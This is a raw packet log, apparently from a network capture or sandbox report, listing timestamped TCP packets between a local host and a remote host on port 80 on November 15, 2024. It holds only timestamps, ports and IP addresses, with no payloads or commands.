Nov 15, 2024 10:36:00.804034948 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.804058075 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.804073095 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.804085970 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.804107904 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.804119110 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.804128885 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.804131031 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.804147005 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.804186106 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.804217100 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.804629087 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.804683924 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.804733038 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.825870037 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.825892925 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.825905085 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.825961113 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.825983047 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.825995922 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.826005936 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.826023102 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.826030970 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.826050997 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.826131105 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.826195002 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.826505899 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.826571941 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.826613903 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.826641083 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.826642990 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.826680899 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.826687098 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.826694012 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.826744080 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.827728987 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.827774048 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.827786922 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.827811956 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.827816963 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.827826023 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.827848911 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.828169107 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.828181028 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.828191042 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.828222990 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.828252077 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.828253984 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.828267097 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.828309059 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.866115093 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866136074 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866162062 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866172075 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866183996 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866194963 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866194010 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.866205931 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866219044 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866231918 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866242886 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.866242886 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866261959 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.866301060 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.866312027 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866323948 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866334915 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866357088 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.866395950 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866409063 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866435051 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866439104 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.866447926 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866460085 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866468906 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.866482019 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.866503000 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.886085033 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.886096001 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.886106968 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.886118889 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.886178017 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.886224031 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.888473988 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.888525963 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.888576984 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.888605118 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.888617039 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.888659954 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.888672113 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.888684034 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.888684034 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.888695002 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.888706923 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.888736963 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.888751984 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.888763905 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.888766050 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.888813972 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.888912916 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.888925076 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.888936996 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.888959885 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.922389030 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922425985 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922437906 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922460079 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.922502995 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.922507048 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922521114 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922539949 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922558069 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.922559023 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922574997 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922586918 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922611952 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.922631025 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922632933 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.922643900 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922658920 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922671080 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922699928 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.922729969 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.922878027 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922892094 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922908068 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922920942 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922933102 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.922935963 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.922957897 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.923032045 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.923043966 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.923065901 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.923075914 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.923078060 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.923091888 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.923103094 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.923115015 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.923115969 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.923129082 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.923131943 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.923171043 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.923764944 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.923795938 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.923813105 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.923818111 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.923827887 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.923839092 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.923865080 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.923894882 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.942955017 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.942985058 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.943010092 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.943028927 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.943038940 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.943058968 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.943070889 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.943083048 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.943093061 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.943150043 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.943332911 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.943351984 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.943409920 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.943582058 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.943608046 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.943619967 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.943650007 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.943725109 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.943737030 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.943748951 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.943774939 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.943803072 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.944828033 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.944838047 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.944850922 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.944878101 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.944890022 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.944895983 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.944902897 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.944940090 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.944972038 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.945107937 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.945118904 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.945169926 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.945183992 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.945216894 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.945230007 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.945240974 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.945259094 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.945281982 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.982892990 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.982939005 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.982949972 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.982994080 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983005047 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983016968 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983114004 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.983131886 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983150005 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983156919 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983160019 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.983198881 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983211040 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983226061 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.983278990 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.983515978 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983540058 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983551979 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983568907 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.983603954 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983614922 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983622074 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.983659983 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.983737946 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983748913 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983788967 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.983803034 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983814001 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983848095 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.983854055 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983865976 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983876944 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.983930111 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.003307104 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.003391027 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.003398895 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.003439903 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.003490925 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.005660057 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.005683899 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.005696058 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.005722046 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.005733967 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.005754948 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.005754948 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.005767107 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.005774021 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.005800962 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.005811930 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.005820990 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.005848885 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.006109953 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.006123066 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.006134987 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.006170034 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.039700031 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.039712906 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.039725065 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.039767027 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.039800882 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.039813042 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.039824963 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.039828062 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.039864063 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.039865971 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.039877892 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.039890051 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.039904118 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.039915085 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.039940119 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.040021896 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.040035963 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.040047884 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.040075064 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.040101051 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.040110111 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.040122032 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.040134907 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.040183067 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.040440083 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.040467024 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.040479898 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.040492058 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.040539026 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.040549040 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.040561914 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.040571928 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.040584087 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.040611029 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.040646076 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.040735006 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.040746927 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.040756941 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.040797949 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.041148901 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.041161060 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.041177034 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.041193962 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.041205883 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.041213036 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.041234970 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.041256905 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.041285038 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.041297913 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.041310072 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.041321039 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.041331053 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.041342020 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.041368008 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.060111046 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.060159922 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.060174942 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.060189962 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.060235023 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.060254097 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.060282946 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.060297966 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.060417891 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.060477972 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.060492992 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.061100960 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.061115980 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.061131001 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.061145067 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.061361074 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.061474085 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.062392950 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.062407017 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.062422991 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.062475920 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.062490940 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.062516928 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.062540054 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.062557936 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.062568903 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.062665939 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.062908888 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.064737082 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.064796925 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.064810991 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.064851999 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.099912882 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.099936008 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.099967003 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.099980116 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.099994898 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.100049973 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.100064039 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.100079060 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.100143909 CET	49741	80	192.168.2.6	150.241.95.163
